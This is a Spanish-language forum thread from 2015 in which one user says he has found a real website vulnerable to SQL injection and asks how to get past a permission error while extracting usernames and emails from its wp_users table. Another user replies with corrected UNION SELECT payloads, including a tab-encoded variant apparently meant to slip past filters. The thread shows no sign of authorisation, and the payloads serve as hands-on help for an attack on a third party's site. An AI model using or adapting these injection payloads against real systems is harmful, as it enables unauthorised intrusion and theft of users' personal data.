El fin de la SQLi

Iniciado por bytefloat, 13 Febrero 2015, 18:31 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

bytefloat

13 Febrero 2015, 18:31 PM
Hola, soy bytefloat, el fin de una sql injection se presenta cuando..?

Código [Seleccionar]
SELECT command denied to user 'www'@'localhost' for table 'tables'

Si ya sé cuantas tablas hay, el nombre de ellas, las columnas de una en específico, y al momento de conseguir el id=1 de una tabla me presenta aquel error, no hay nada que hacer?
Código [Seleccionar]
-1/+union+select+1,unhex(hex(notice_id)),3,4,5,6,7,8,9,10+from+wp_users.tables+limit+1,1--

Saludos :D

Shell Root

#1
13 Febrero 2015, 19:41 PM
No entendi lo que quieres preguntar.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

bytefloat

#2
13 Febrero 2015, 20:33 PM
Claro, tenía cierta página la cual es vulnerable a sqli, por lo que proseguí a sacar el nombre de las tablas dentro de ellas, columnas, etc .. , hasta que llegue a la tabla de "users", la cual quise investigar dentro más de ella, saque que su primer columna es "users", su segunda es "mail", sólo me interesan estas, entonces quiero sacar el users y mail del id=1 , pero al hacerlo me manda el siguiente error intentando con el siguiente código:
Código [Seleccionar]
php?id=-1+union+select+1,unhex(hex(users)),3,4,5,6,7,8,9,10+from+wp_users.tables+limit+1,1--

Código [Seleccionar]
SELECT command denied to user 'www'@'localhost' for table 'tables'

Y no puedo saber el usuario..
Si no se me entiende, supongamos que quiero sacar user y pass de la tabla wp_users la cual ya sé sus columnas, pero que al momento de hacer un select a los usuarios no me deja

Saludos

Shell Root

#3
13 Febrero 2015, 21:12 PM Ultima modificación: 13 Febrero 2015, 22:29 PM por Shell Root
Es como si no tuviera permisos para realizar un SELECT, pero no se estaraís haciendo, pero si me dices que ya sabes cual tabla es, los campos de la tabla, y ahora quieres mirar el registro.

Sería algo como esto:
Código (sql) [Seleccionar]
-1/+UNION+ALL+SELECT+1,CONCAT(users, ':', mail),3,4,5,6,7,8,9,10+FROM+wp_users+LIMIT+1,1--

PD: Te envie un M.P!

-- EDIT ----------------------------------------------------------
No se como estaras haciendo pero mal!
Código (sql) [Seleccionar]
-1%09UNION%09ALL%09SELECT%091,usuario,3,4,5,6,7,8,9,0%09FROM%09usuarios--
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario